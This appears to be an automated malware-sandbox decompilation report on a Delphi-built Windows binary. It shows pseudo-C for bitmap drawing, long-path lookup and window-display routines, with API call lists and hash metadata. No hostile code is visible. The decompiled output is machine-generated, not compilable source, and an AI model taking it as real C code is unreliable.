                                                                                							E004201BC(_v20);
                                                                                							_v24 = E004201BC(SelectObject(_v32, _v20));
                                                                                							_push(_t457);
                                                                                							_push(0x42368b);
                                                                                							_push( *[fs:eax]);
                                                                                							 *[fs:eax] = _t460;
                                                                                							_push(_t457);
                                                                                							_push(0x42367a);
                                                                                							_push( *[fs:eax]);
                                                                                							 *[fs:eax] = _t460;
                                                                                							_v56 = 0;
                                                                                							_t422 = 0;
                                                                                							if(_v16 != 0) {
                                                                                								_v56 = SelectPalette(_v32, _v16, 0);
                                                                                								RealizePalette(_v32);
                                                                                							}
                                                                                							_push(_t457);
                                                                                							_push(0x423658);
                                                                                							_push( *[fs:eax]);
                                                                                							 *[fs:eax] = _t460;
                                                                                							if(_a4 == 0) {
                                                                                								PatBlt(_v32, 0, 0,  *(_a8 + 4),  *(_a8 + 8), 0xff0062);
                                                                                							} else {
                                                                                								_t366 = E0041F36C( *((intOrPtr*)(_a4 + 0x14)));
                                                                                								_t142 =  &_v156; // 0x423658
                                                                                								E00412984(0,  *(_a8 + 4), 0, _t142,  *(_a8 + 8));
                                                                                								_t145 =  &_v156; // 0x423658
                                                                                								FillRect(_v32, _t145, _t366);
                                                                                								SetTextColor(_v32, E0041E68C( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18))));
                                                                                								SetBkColor(_v32, E0041E68C(E0041F330( *((intOrPtr*)(_a4 + 0x14)))));
                                                                                								if( *(_a8 + 0x26) == 1 &&  *((intOrPtr*)(_a8 + 0x14)) != 0) {
                                                                                									_v52 = E0041E68C( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18)));
                                                                                									_v48 = E0041E68C(E0041F330( *((intOrPtr*)(_a4 + 0x14))));
                                                                                									SetDIBColorTable(_v32, 0, 2,  &_v52);
                                                                                								}
                                                                                							}
                                                                                							if(_v8 == 0) {
                                                                                								_pop(_t444);
                                                                                								 *[fs:eax] = _t444;
                                                                                								_push(E0042365F);
                                                                                								if(_v16 != 0) {
                                                                                									return SelectPalette(_v32, _v56, 0xffffffff);
                                                                                								}
                                                                                								return 0;
                                                                                							} else {
                                                                                								_v36 = E004201BC(CreateCompatibleDC(_v28));
                                                                                								_push(_t457);
                                                                                								_push(0x42362e);
                                                                                								_push( *[fs:eax]);
                                                                                								 *[fs:eax] = _t460;
                                                                                								_t455 = E004201BC(SelectObject(_v36, _v8));
                                                                                								if(_v12 != 0) {
                                                                                									_t422 = SelectPalette(_v36, _v12, 0);
                                                                                									RealizePalette(_v36);
                                                                                								}
                                                                                								if(_a4 != 0) {
                                                                                									SetTextColor(_v36, E0041E68C( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18))));
                                                                                									SetBkColor(_v36, E0041E68C(E0041F330( *((intOrPtr*)(_a4 + 0x14)))));
                                                                                								}
                                                                                								BitBlt(_v32, 0, 0,  *(_a8 + 4),  *(_a8 + 8), _v36, 0, 0, 0xcc0020);
                                                                                								if(_v12 != 0) {
                                                                                									SelectPalette(_v36, _t422, 0xffffffff);
                                                                                								}
                                                                                								E004201BC(SelectObject(_v36, _t455));
                                                                                								_pop(_t445);
                                                                                								 *[fs:eax] = _t445;
                                                                                								_push(0x423635);
                                                                                								return DeleteDC(_v36);
                                                                                							}
                                                                                						}
                                                                                					} else {
                                                                                						goto L61;
                                                                                					}
                                                                                				} else {
                                                                                					L61:
                                                                                					return _v20;
                                                                                				}
                                                                                			}






































                                                                                0x00423375
                                                                                0x004233d0
                                                                                0x004233d3
                                                                                0x004233d6
                                                                                0x004233e3
                                                                                0x0042339a
                                                                                0x004233aa
                                                                                0x004233ba
                                                                                0x004233bf
                                                                                0x004233c4
                                                                                0x00000000
                                                                                0x004233c4
                                                                                0x00423152
                                                                                0x00423164
                                                                                0x004231a8
                                                                                0x00423166
                                                                                0x00423184
                                                                                0x00423184
                                                                                0x004233ee
                                                                                0x00423405
                                                                                0x0042340a
                                                                                0x0042340b
                                                                                0x00423410
                                                                                0x00423413
                                                                                0x00423418
                                                                                0x00423419
                                                                                0x0042341e
                                                                                0x00423421
                                                                                0x00423426
                                                                                0x00423429
                                                                                0x0042342f
                                                                                0x00423440
                                                                                0x00423447
                                                                                0x00423447
                                                                                0x0042344e
                                                                                0x0042344f
                                                                                0x00423454
                                                                                0x00423457
                                                                                0x0042345e
                                                                                0x00423534
                                                                                0x00423464
                                                                                0x0042346a
                                                                                0x00423477
                                                                                0x00423488
                                                                                0x0042348d
                                                                                0x00423498
                                                                                0x004234b0
                                                                                0x004234ca
                                                                                0x004234d7
                                                                                0x004234f0
                                                                                0x00423503
                                                                                0x00423512
                                                                                0x00423512
                                                                                0x004234d7
                                                                                0x0042353d
                                                                                0x00423637
                                                                                0x0042363a
                                                                                0x0042363d
                                                                                0x00423646
                                                                                0x00000000
                                                                                0x00423652
                                                                                0x00423657
                                                                                0x00423543
                                                                                0x00423551
                                                                                0x00423556
                                                                                0x00423557
                                                                                0x0042355c
                                                                                0x0042355f
                                                                                0x00423574
                                                                                0x0042357a
                                                                                0x0042358b
                                                                                0x00423591
                                                                                0x00423591
                                                                                0x0042359a
                                                                                0x004235af
                                                                                0x004235c9
                                                                                0x004235c9
                                                                                0x004235f1
                                                                                0x004235fa
                                                                                0x00423603
                                                                                0x00423603
                                                                                0x00423612
                                                                                0x00423619
                                                                                0x0042361c
                                                                                0x0042361f
                                                                                0x0042362d
                                                                                0x0042362d
                                                                                0x0042353d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004236e1
                                                                                0x004236e1
                                                                                0x004236ea
                                                                                0x004236ea

                                                                                APIs
                                                                                • GetObjectA.GDI32(00000000,00000054,?), ref: 0042310C
                                                                                • GetDC.USER32(00000000), ref: 0042311D
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 0042312E
                                                                                • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 0042317A
                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0042319E
                                                                                • SelectObject.GDI32(00000000,?), ref: 004233FB
                                                                                • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0042343B
                                                                                • RealizePalette.GDI32(00000000), ref: 00423447
                                                                                • SetTextColor.GDI32(00000000,00000000), ref: 004234B0
                                                                                • SetBkColor.GDI32(00000000,00000000), ref: 004234CA
                                                                                • SetDIBColorTable.GDI32(00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00423658,?,00000000,0042367A), ref: 00423512
                                                                                • FillRect.USER32 ref: 00423498
                                                                                  • Part of subcall function 0041E68C: GetSysColor.USER32(?), ref: 0041E696
                                                                                • PatBlt.GDI32(00000000,00000000,00000000,?,?,00FF0062), ref: 00423534
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00423547
                                                                                • SelectObject.GDI32(?,00000000), ref: 0042356A
                                                                                • SelectPalette.GDI32(?,00000000,00000000), ref: 00423586
                                                                                • RealizePalette.GDI32(?), ref: 00423591
                                                                                • SetTextColor.GDI32(?,00000000), ref: 004235AF
                                                                                • SetBkColor.GDI32(?,00000000), ref: 004235C9
                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 004235F1
                                                                                • SelectPalette.GDI32(?,00000000,000000FF), ref: 00423603
                                                                                • SelectObject.GDI32(?,00000000), ref: 0042360D
                                                                                • DeleteDC.GDI32(?), ref: 00423628
                                                                                  • Part of subcall function 0041F36C: CreateBrushIndirect.GDI32(?), ref: 0041F416
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: ColorSelect$CreatePalette$Object$Compatible$BitmapRealizeText$BrushDeleteFillIndirectRectTable
                                                                                • String ID: O9B$X6B
                                                                                • API String ID: 1299887459-1918398730
                                                                                • Opcode ID: 337899b110d8e44155190b4d493529486f2c8e141b0128cb09fcebc361404379
                                                                                • Instruction ID: 69607caf7539a41bed6a4c2d19560975605044106fb116b03be2fe6c642a9b26
                                                                                • Opcode Fuzzy Hash: 337899b110d8e44155190b4d493529486f2c8e141b0128cb09fcebc361404379
                                                                                • Instruction Fuzzy Hash: 1D120B71A00218AFDB10EFA9D885F9EB7F8EB08315F518456F914EB291C778EE41CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 53%
                                                                                			E00405AC0(char* __eax, intOrPtr __edx) {
                                                                                				char* _v8;
                                                                                				intOrPtr _v12;
                                                                                				intOrPtr _v16;
                                                                                				struct _WIN32_FIND_DATAA _v334;
                                                                                				char _v595;
                                                                                				void* _t45;
                                                                                				char* _t54;
                                                                                				char* _t64;
                                                                                				void* _t83;
                                                                                				intOrPtr* _t84;
                                                                                				char* _t90;
                                                                                				struct HINSTANCE__* _t91;
                                                                                				char* _t93;
                                                                                				void* _t94;
                                                                                				char* _t95;
                                                                                				void* _t96;
                                                                                
                                                                                				_v12 = __edx;
                                                                                				_v8 = __eax;
                                                                                				_v16 = _v8;
                                                                                				_t91 = GetModuleHandleA("kernel32.dll");
                                                                                				if(_t91 == 0) {
                                                                                					L4:
                                                                                					if( *_v8 != 0x5c) {
                                                                                						_t93 = _v8 + 2;
                                                                                						goto L10;
                                                                                					} else {
                                                                                						if( *((char*)(_v8 + 1)) == 0x5c) {
                                                                                							_t95 = E00405AAC(_v8 + 2);
                                                                                							if( *_t95 != 0) {
                                                                                								_t14 = _t95 + 1; // 0x1
                                                                                								_t93 = E00405AAC(_t14);
                                                                                								if( *_t93 != 0) {
                                                                                									L10:
                                                                                									_t83 = _t93 - _v8;
                                                                                									_push(_t83 + 1);
                                                                                									_push(_v8);
                                                                                									_push( &_v595);
                                                                                									L00401310();
                                                                                									while( *_t93 != 0) {
                                                                                										_t90 = E00405AAC(_t93 + 1);
                                                                                										_t45 = _t90 - _t93;
                                                                                										if(_t45 + _t83 + 1 <= 0x105) {
                                                                                											_push(_t45 + 1);
                                                                                											_push(_t93);
                                                                                											_push( &(( &_v595)[_t83]));
                                                                                											L00401310();
                                                                                											_t94 = FindFirstFileA( &_v595,  &_v334);
                                                                                											if(_t94 != 0xffffffff) {
                                                                                												FindClose(_t94);
                                                                                												_t54 =  &(_v334.cFileName);
                                                                                												_push(_t54);
                                                                                												L00401318();
                                                                                												if(_t54 + _t83 + 1 + 1 <= 0x105) {
                                                                                													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
                                                                                													_push(0x105 - _t83 - 1);
                                                                                													_push( &(_v334.cFileName));
                                                                                													_push( &(( &(( &_v595)[_t83]))[1]));
                                                                                													L00401310();
                                                                                													_t64 =  &(_v334.cFileName);
                                                                                													_push(_t64);
                                                                                													L00401318();
                                                                                													_t83 = _t83 + _t64 + 1;
                                                                                													_t93 = _t90;
                                                                                													continue;
                                                                                												}
                                                                                											}
                                                                                										}
                                                                                										goto L17;
                                                                                									}
                                                                                									_push(_v12);
                                                                                									_push( &_v595);
                                                                                									_push(_v8);
                                                                                									L00401310();
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				} else {
                                                                                					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
                                                                                					if(_t84 == 0) {
                                                                                						goto L4;
                                                                                					} else {
                                                                                						_push(0x105);
                                                                                						_push( &_v595);
                                                                                						_push(_v8);
                                                                                						if( *_t84() == 0) {
                                                                                							goto L4;
                                                                                						} else {
                                                                                							_push(_v12);
                                                                                							_push( &_v595);
                                                                                							_push(_v8);
                                                                                							L00401310();
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				L17:
                                                                                				return _v16;
                                                                                			}



















                                                                                0x00405b0d
                                                                                0x00000000
                                                                                0x00405b0f
                                                                                0x00405b12
                                                                                0x00405b19
                                                                                0x00405b1d
                                                                                0x00405b1e
                                                                                0x00405b1e
                                                                                0x00405b0d
                                                                                0x00405af7
                                                                                0x00405c4a
                                                                                0x00405c53

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000001,0046B08C,?,00405D20,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405ADD
                                                                                • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00405AEE
                                                                                • lstrcpyn.KERNEL32(?,?,?,?,00000001,0046B08C,?,00405D20,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00405B1E
                                                                                • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,00000001,0046B08C,?,00405D20,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00405B82
                                                                                • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00000001,0046B08C,?,00405D20,00000000,00405D7D,?,80000001), ref: 00405BB7
                                                                                • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0046B08C,?,00405D20,00000000,00405D7D), ref: 00405BCA
                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0046B08C,?,00405D20,00000000), ref: 00405BD7
                                                                                • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0046B08C,?,00405D20), ref: 00405BE3
                                                                                • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001), ref: 00405C17
                                                                                • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 00405C23
                                                                                • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00405C45
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                • API String ID: 3245196872-1565342463
                                                                                • Opcode ID: 205054ec60151739824bfc0cfe4213723e452c19be612335f9d6d27625c40468
                                                                                • Instruction ID: 296a13db2414833b3bf80d2bdfa437c82c634a9cd7f8270e4b53d567bb21fe4a
                                                                                • Opcode Fuzzy Hash: 205054ec60151739824bfc0cfe4213723e452c19be612335f9d6d27625c40468
                                                                                • Instruction Fuzzy Hash: BD416072900619ABEB10DAA8CC85EDFB7EDDF44314F1405B7B949F7281D638AE408F68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 83%
                                                                                			E00451994(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
                                                                                				intOrPtr* _v8;
                                                                                				char _v12;
                                                                                				intOrPtr _t149;
                                                                                				intOrPtr _t154;
                                                                                				intOrPtr _t155;
                                                                                				intOrPtr _t160;
                                                                                				intOrPtr _t162;
                                                                                				intOrPtr _t163;
                                                                                				void* _t165;
                                                                                				struct HWND__* _t166;
                                                                                				long _t176;
                                                                                				signed int _t198;
                                                                                				signed int _t199;
                                                                                				long _t220;
                                                                                				intOrPtr _t226;
                                                                                				int _t231;
                                                                                				intOrPtr _t232;
                                                                                				intOrPtr _t241;
                                                                                				intOrPtr _t245;
                                                                                				signed int _t248;
                                                                                				intOrPtr _t251;
                                                                                				intOrPtr _t252;
                                                                                				signed int _t258;
                                                                                				long _t259;
                                                                                				intOrPtr _t262;
                                                                                				intOrPtr _t266;
                                                                                				signed int _t269;
                                                                                				intOrPtr _t270;
                                                                                				intOrPtr _t271;
                                                                                				signed int _t277;
                                                                                				long _t278;
                                                                                				intOrPtr _t281;
                                                                                				signed int _t286;
                                                                                				signed int _t287;
                                                                                				long _t290;
                                                                                				intOrPtr _t294;
                                                                                				struct HWND__* _t299;
                                                                                				signed int _t301;
                                                                                				signed int _t302;
                                                                                				signed int _t305;
                                                                                				signed int _t307;
                                                                                				long _t308;
                                                                                				signed int _t311;
                                                                                				signed int _t313;
                                                                                				long _t314;
                                                                                				signed int _t317;
                                                                                				signed int _t318;
                                                                                				signed int _t326;
                                                                                				long _t328;
                                                                                				intOrPtr _t331;
                                                                                				intOrPtr _t362;
                                                                                				long _t370;
                                                                                				void* _t372;
                                                                                				void* _t373;
                                                                                				intOrPtr _t374;
                                                                                
                                                                                				_t372 = _t373;
                                                                                				_t374 = _t373 + 0xfffffff8;
                                                                                				_v12 = 0;
                                                                                				_v8 = __eax;
                                                                                				_push(_t372);
                                                                                				_push(0x451efe);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t374;
                                                                                				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x2ec) & 0x00000004) != 0) {
                                                                                					_t294 =  *0x486dc0; // 0x41cc74
                                                                                					E00406520(_t294,  &_v12);
                                                                                					E0040A0B0(_v12, 1);
                                                                                					E00403D80();
                                                                                				}
                                                                                				_t149 =  *0x487bfc; // 0x22e1310
                                                                                				E00455F6C(_t149);
                                                                                				 *(_v8 + 0x2ec) =  *(_v8 + 0x2ec) | 0x00000004;
                                                                                				_push(_t372);
                                                                                				_push(0x451ee1);
                                                                                				_push( *[fs:edx]);
                                                                                				 *[fs:edx] = _t374;
                                                                                				if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
                                                                                					_t155 = _v8;
                                                                                					_t378 =  *((char*)(_t155 + 0x1a6));
                                                                                					if( *((char*)(_t155 + 0x1a6)) == 0) {
                                                                                						_push(_t372);
                                                                                						_push(0x451de8);
                                                                                						_push( *[fs:eax]);
                                                                                						 *[fs:eax] = _t374;
                                                                                						E004037B0(_v8, __eflags);
                                                                                						 *[fs:eax] = 0;
                                                                                						_t160 =  *0x487c00; // 0x22e0f1c
                                                                                						__eflags =  *((intOrPtr*)(_t160 + 0x6c)) - _v8;
                                                                                						if( *((intOrPtr*)(_t160 + 0x6c)) == _v8) {
                                                                                							__eflags = 0;
                                                                                							E00450B80(_v8, 0);
                                                                                						}
                                                                                						_t162 = _v8;
                                                                                						__eflags =  *((char*)(_t162 + 0x22f)) - 1;
                                                                                						if( *((char*)(_t162 + 0x22f)) != 1) {
                                                                                							_t163 = _v8;
                                                                                							__eflags =  *(_t163 + 0x2ec) & 0x00000008;
                                                                                							if(( *(_t163 + 0x2ec) & 0x00000008) == 0) {
                                                                                								_t299 = 0;
                                                                                								_t165 = E0043BD14(_v8);
                                                                                								_t166 = GetActiveWindow();
                                                                                								__eflags = _t165 - _t166;
                                                                                								if(_t165 == _t166) {
                                                                                									_t176 = IsIconic(E0043BD14(_v8));
                                                                                									__eflags = _t176;
                                                                                									if(_t176 == 0) {
                                                                                										_t299 = E0044C7E0(E0043BD14(_v8));
                                                                                									}
                                                                                								}
                                                                                								__eflags = _t299;
                                                                                								if(_t299 == 0) {
                                                                                									ShowWindow(E0043BD14(_v8), 0);
                                                                                								} else {
                                                                                									SetWindowPos(E0043BD14(_v8), 0, 0, 0, 0, 0, 0x97);
                                                                                									SetActiveWindow(_t299);
                                                                                								}
                                                                                							} else {
                                                                                								SetWindowPos(E0043BD14(_v8), 0, 0, 0, 0, 0, 0x97);
                                                                                							}
                                                                                						} else {
                                                                                							E00439390(_v8);
                                                                                						}
                                                                                					} else {
                                                                                						_push(_t372);
                                                                                						_push(0x451a4c);
                                                                                						_push( *[fs:eax]);
                                                                                						 *[fs:eax] = _t374;
                                                                                						E004037B0(_v8, _t378);
                                                                                						 *[fs:eax] = 0;
                                                                                						if( *((char*)(_v8 + 0x230)) == 4 ||  *((char*)(_v8 + 0x230)) == 6 &&  *((char*)(_v8 + 0x22f)) == 1) {
                                                                                							if( *((char*)(_v8 + 0x22f)) != 1) {
                                                                                								_t301 = E004531C4() -  *(_v8 + 0x48);
                                                                                								__eflags = _t301;
                                                                                								_t302 = _t301 >> 1;
                                                                                								if(_t301 < 0) {
                                                                                									asm("adc ebx, 0x0");
                                                                                								}
                                                                                								_t198 = E004531B8() -  *(_v8 + 0x4c);
                                                                                								__eflags = _t198;
                                                                                								_t199 = _t198 >> 1;
                                                                                								if(_t198 < 0) {
                                                                                									asm("adc eax, 0x0");
                                                                                								}
                                                                                							} else {
                                                                                								_t241 =  *0x487bfc; // 0x22e1310
                                                                                								_t305 = E004350A4( *((intOrPtr*)(_t241 + 0x44))) -  *(_v8 + 0x48);
                                                                                								_t302 = _t305 >> 1;
                                                                                								if(_t305 < 0) {
                                                                                									asm("adc ebx, 0x0");
                                                                                								}
                                                                                								_t245 =  *0x487bfc; // 0x22e1310
                                                                                								_t248 = E004350E8( *((intOrPtr*)(_t245 + 0x44))) -  *(_v8 + 0x4c);
                                                                                								_t199 = _t248 >> 1;
                                                                                								if(_t248 < 0) {
                                                                                									asm("adc eax, 0x0");
                                                                                								}
                                                                                							}
                                                                                							if(_t302 < 0) {
                                                                                								_t302 = 0;
                                                                                							}
                                                                                							if(_t199 < 0) {
                                                                                								_t199 = 0;
                                                                                							}
                                                                                							_t326 = _t199;
                                                                                							 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                                                                                							if( *((char*)(_v8 + 0x57)) != 0) {
                                                                                								E0044FE34(_v8, _t326);
                                                                                							}
                                                                                						} else {
                                                                                							_t251 =  *((intOrPtr*)(_v8 + 0x230));
                                                                                							__eflags = _t251 + 0xfa - 2;
                                                                                							if(_t251 + 0xfa - 2 >= 0) {
                                                                                								__eflags = _t251 - 5;
                                                                                								if(_t251 == 5) {
                                                                                									_t252 = _v8;
                                                                                									__eflags =  *((char*)(_t252 + 0x22f)) - 1;
                                                                                									if( *((char*)(_t252 + 0x22f)) != 1) {
                                                                                										_t307 = E004531F4() -  *(_v8 + 0x48);
                                                                                										__eflags = _t307;
                                                                                										_t308 = _t307 >> 1;
                                                                                										if(_t307 < 0) {
                                                                                											asm("adc ebx, 0x0");
                                                                                										}
                                                                                										_t258 = E004531E8() -  *(_v8 + 0x4c);
                                                                                										__eflags = _t258;
                                                                                										_t259 = _t258 >> 1;
                                                                                										if(_t258 < 0) {
                                                                                											asm("adc eax, 0x0");
                                                                                										}
                                                                                									} else {
                                                                                										_t262 =  *0x487bfc; // 0x22e1310
                                                                                										_t311 = E004350A4( *((intOrPtr*)(_t262 + 0x44))) -  *(_v8 + 0x48);
                                                                                										__eflags = _t311;
                                                                                										_t308 = _t311 >> 1;
                                                                                										if(_t311 < 0) {
                                                                                											asm("adc ebx, 0x0");
                                                                                										}
                                                                                										_t266 =  *0x487bfc; // 0x22e1310
                                                                                										_t269 = E004350E8( *((intOrPtr*)(_t266 + 0x44))) -  *(_v8 + 0x4c);
                                                                                										__eflags = _t269;
                                                                                										_t259 = _t269 >> 1;
                                                                                										if(_t269 < 0) {
                                                                                											asm("adc eax, 0x0");
                                                                                										}
                                                                                									}
                                                                                									__eflags = _t308;
                                                                                									if(_t308 < 0) {
                                                                                										_t308 = 0;
                                                                                										__eflags = 0;
                                                                                									}
                                                                                									__eflags = _t259;
                                                                                									if(_t259 < 0) {
                                                                                										_t259 = 0;
                                                                                										__eflags = 0;
                                                                                									}
                                                                                									 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                                                                                								}
                                                                                							} else {
                                                                                								_t270 =  *0x487bfc; // 0x22e1310
                                                                                								_t370 =  *(_t270 + 0x44);
                                                                                								_t271 = _v8;
                                                                                								__eflags =  *((char*)(_t271 + 0x230)) - 7;
                                                                                								if( *((char*)(_t271 + 0x230)) == 7) {
                                                                                									_t362 =  *0x44b170; // 0x44b1bc
                                                                                									_t290 = E00403740( *(_v8 + 4), _t362);
                                                                                									__eflags = _t290;
                                                                                									if(_t290 != 0) {
                                                                                										_t370 =  *(_v8 + 4);
                                                                                									}
                                                                                								}
                                                                                								__eflags = _t370;
                                                                                								if(_t370 == 0) {
                                                                                									_t313 = E004531C4() -  *(_v8 + 0x48);
                                                                                									__eflags = _t313;
                                                                                									_t314 = _t313 >> 1;
                                                                                									if(_t313 < 0) {
                                                                                										asm("adc ebx, 0x0");
                                                                                									}
                                                                                									_t277 = E004531B8() -  *(_v8 + 0x4c);
                                                                                									__eflags = _t277;
                                                                                									_t278 = _t277 >> 1;
                                                                                									if(_t277 < 0) {
                                                                                										asm("adc eax, 0x0");
                                                                                									}
                                                                                								} else {
                                                                                									_t317 =  *((intOrPtr*)(_t370 + 0x48)) -  *(_v8 + 0x48);
                                                                                									__eflags = _t317;
                                                                                									_t318 = _t317 >> 1;
                                                                                									if(_t317 < 0) {
                                                                                										asm("adc ebx, 0x0");
                                                                                									}
                                                                                									_t314 = _t318 +  *((intOrPtr*)(_t370 + 0x40));
                                                                                									_t286 =  *((intOrPtr*)(_t370 + 0x4c)) -  *(_v8 + 0x4c);
                                                                                									__eflags = _t286;
                                                                                									_t287 = _t286 >> 1;
                                                                                									if(_t286 < 0) {
                                                                                										asm("adc eax, 0x0");
                                                                                									}
                                                                                									_t278 = _t287 +  *((intOrPtr*)(_t370 + 0x44));
                                                                                								}
                                                                                								__eflags = _t314;
                                                                                								if(_t314 < 0) {
                                                                                									_t314 = 0;
                                                                                									__eflags = 0;
                                                                                								}
                                                                                								__eflags = _t278;
                                                                                								if(_t278 < 0) {
                                                                                									_t278 = 0;
                                                                                									__eflags = 0;
                                                                                								}
                                                                                								_t328 = _t278;
                                                                                								 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                                                                                								_t281 = _v8;
                                                                                								__eflags =  *((char*)(_t281 + 0x57));
                                                                                								if( *((char*)(_t281 + 0x57)) != 0) {
                                                                                									E0044FE34(_v8, _t328);
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						 *((char*)(_v8 + 0x230)) = 0;
                                                                                						if( *((char*)(_v8 + 0x22f)) != 1) {
                                                                                							ShowWindow(E0043BD14(_v8),  *(0x46bb98 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
                                                                                						} else {
                                                                                							if( *(_v8 + 0x22b) != 2) {
                                                                                								ShowWindow(E0043BD14(_v8),  *(0x46bb98 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
                                                                                								_t220 =  *(_v8 + 0x48) |  *(_v8 + 0x4c) << 0x00000010;
                                                                                								__eflags = _t220;
                                                                                								CallWindowProcA(0x406cf0, E0043BD14(_v8), 5, 0, _t220);
                                                                                								E00435900();
                                                                                							} else {
                                                                                								_t231 = E0043BD14(_v8);
                                                                                								_t232 =  *0x487bfc; // 0x22e1310
                                                                                								SendMessageA( *( *((intOrPtr*)(_t232 + 0x44)) + 0x254), 0x223, _t231, 0);
                                                                                								ShowWindow(E0043BD14(_v8), 3);
                                                                                							}
                                                                                							_t226 =  *0x487bfc; // 0x22e1310
                                                                                							SendMessageA( *( *((intOrPtr*)(_t226 + 0x44)) + 0x254), 0x234, 0, 0);
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				_pop(_t331);
                                                                                				 *[fs:eax] = _t331;
                                                                                				_push(0x451ee8);
                                                                                				_t154 = _v8;
                                                                                				 *(_t154 + 0x2ec) =  *(_t154 + 0x2ec) & 0x000000fb;
                                                                                				return _t154;
                                                                                			}

                                                                                APIs
                                                                                • SendMessageA.USER32 ref: 00451D15
                                                                                  • Part of subcall function 00406520: LoadStringA.USER32 ref: 00406551
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: LoadMessageSendString
                                                                                • String ID:
                                                                                • API String ID: 1946433856-0
                                                                                • Opcode ID: 541b26ac64cf00f76a0f80d0906944bc33b71ebc3d0579da3fa8d669e40ef3c6
